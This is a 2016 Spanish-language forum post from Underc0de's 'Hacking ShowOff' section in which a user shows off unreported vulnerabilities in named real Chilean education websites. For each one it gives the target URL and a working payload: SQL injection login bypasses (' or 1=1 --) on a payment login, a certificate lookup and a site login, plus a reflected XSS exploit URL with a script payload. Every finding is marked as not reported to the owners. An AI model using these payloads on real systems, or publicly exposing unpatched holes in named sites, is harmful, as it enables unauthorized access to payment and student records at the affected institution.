Imprimir Página - [XSS, SQLi] www.ipchile.cl

Título: [XSS, SQLi] www.ipchile.cl
Publicado por: rreedd en Marzo 04, 2016, 07:24:51 PM

RREEDD

Hola a todos les presento mi primer post en hacking showOff. ;D
Espero les guste.

Sitio: www.ipchile.cl

Descripción Del Sitio: Instituto de educación técnico profesional Chileno.

Lista de Vulnerabilidades.

[SQLi] Inyección en login de pagos.

(http://fotos.subefotos.com/5a21ab5a2ffa5666f4a8e85049a04f00o.png)

Url del sitio : http://portal.ipchile.cl/pagoOnLine/pagoOnLine.php (http://portal.ipchile.cl/pagoOnLine/pagoOnLine.php)
Inyeccion : ' or 1=1 --
Reportado: NO
Autor: RREEDD
[XSS] Inyección en URL .

(http://fotos.subefotos.com/4f935683c6a7f9e9b0a3241d22826c6eo.png)

Url del sitio :http://portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=2&EE=6&t=f19f9dd13924c30d66c9902KUcinf (http://portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=2&EE=6&t=f19f9dd13924c30d66c9902KUcinf)
Vector : ><script>prompt("underc0de", " By RREEDD");</script>
xploit : portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=><script>prompt("underc0de", " By RREEDD");</script>&EE=6&t=f19f9dd13924c30d66c9902KUcinf (http://portal.cepech.cl/gnr/gnrpagos2PR_2.asp?NP=nada&RR=><script>prompt("underc0de",%20"%20By %20RREEDD");</script>&EE=6&t=f19f9dd13924c30d66c9902KUcinf)
Reportado: NO
Autor: RREEDD
[SQLi] Inyección en sector de consulta de certificados.

(http://fotos.subefotos.com/0060a8010fe132006360df5af0ba36c8o.png)

Url del sitio : http://www.ipchile.cl/consulta-certificado/ (http://www.ipchile.cl/consulta-certificado/)
Inyeccion : ' or 1=1 --
Metodo : POST
Reportado: NO
Autor: RREEDD
[SQLi] Inyección en sector login.

(http://fotos.subefotos.com/f3af38633af921788de3341113d188bfo.png)
~~Adentro~~
(http://fotos.subefotos.com/ca6bf8aa7038257d12027a69c319029fo.png)

Url del sitio : http://www.ipchile.cl/?page_id=17020 (http://www.ipchile.cl/?page_id=17020)
Inyeccion : ' or 1=1 --
Reportado: NO
Autor: RREEDD

Me gustaría si me pueden ayudar a reportarlo.
Saludos desde Chile.

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: rreedd en Marzo 04, 2016, 07:24:51 PM